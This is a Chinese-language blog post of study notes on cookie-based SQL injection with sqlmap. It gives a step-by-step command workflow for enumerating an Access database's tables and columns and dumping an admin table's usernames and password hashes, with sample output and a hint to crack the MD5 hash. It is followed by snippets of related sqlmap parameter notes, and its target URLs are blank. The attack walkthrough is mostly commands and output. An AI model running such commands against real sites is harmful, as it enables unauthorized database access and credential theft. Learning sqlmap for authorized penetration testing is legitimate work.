3 羽翼sqlmap學習筆記之Cookie注入

2021-09-06 19:46:58 字數 1441 閱讀 7019

cookie注入:

1.假設這個**""存在注入點.

2.sqlmap命令提示符下輸入下列內容進行跑錶。

sqlmap -u "

" --cookie "

id=9

" --table --level 2

假設返回內容如下,說明是access資料庫。

--

-----------------------

[info

] resuming back-

end dbms '

microsoft access'--

-----------------------

設定執行緒數:10

假設返回結果:

--

-----------------------------------------

[4 tables]+

----------------------+

admin

mark

province

vote+--

--------------------+

找到四個表分別為:admin mark province vote

3.猜表的欄位名:

sqlmap -u "

" --cookie "

id=9

" --columns -t admin --level 2

假設找到admin表的字段如下:

id username password 

--

-------------------------------

[info

]retrieved: id [

info

]retrieved: username [

info

]retrieved: password

----------------------------------

4.猜測欄位的內容:

sqlmap -u "

" --cookie "

id=9

" --dump -t admin -c "

username,password

" --level 2

獲取結果:

[

info

] retrieved: 1

[info

]retrieved: admin [

info

] retrieved: 21232f297a57a5a743894a0e4a801fc3 (32位md5加密密文)

賬號:admin 密碼:將密文解密即可。

sqlmap學習筆記

環境 centos7 python2.7.5 sqlmap1.1.8.2 dev sqlmap檔案目錄 執行命名格式 python sqlmap.py h 常用命令 通過幫助資訊可以,找到需要的命令 h 顯示基本幫助資訊 hh 顯示高階幫助資訊 u url,url url 目標url cookie ...

SQLMAP學習筆記(二)

常用引數 u 注入點 f 指紋判別資料庫型別 b 獲取資料庫版本資訊 p 指定可測試的引數 page 1 id 2 p page,id d 指定資料庫名 t 指定表名 c 指定字段 s 儲存注入過程到乙個檔案,還可中斷,下次恢復在注入 儲存 s xx.log 恢復 s xx.log resume c...

Sqlmap學習筆記(三)

sqlmap效能優化設定 sqlmap設定持久http連線,sqlmap預設是一次連線成功後馬上關閉。http報文中相當於connection close 一次連線馬上關閉 要掃瞄站點的url比較多時,這樣比較耗費效能,所以需要將http連線持久化來提高掃瞄效能。http報文相當於connectio...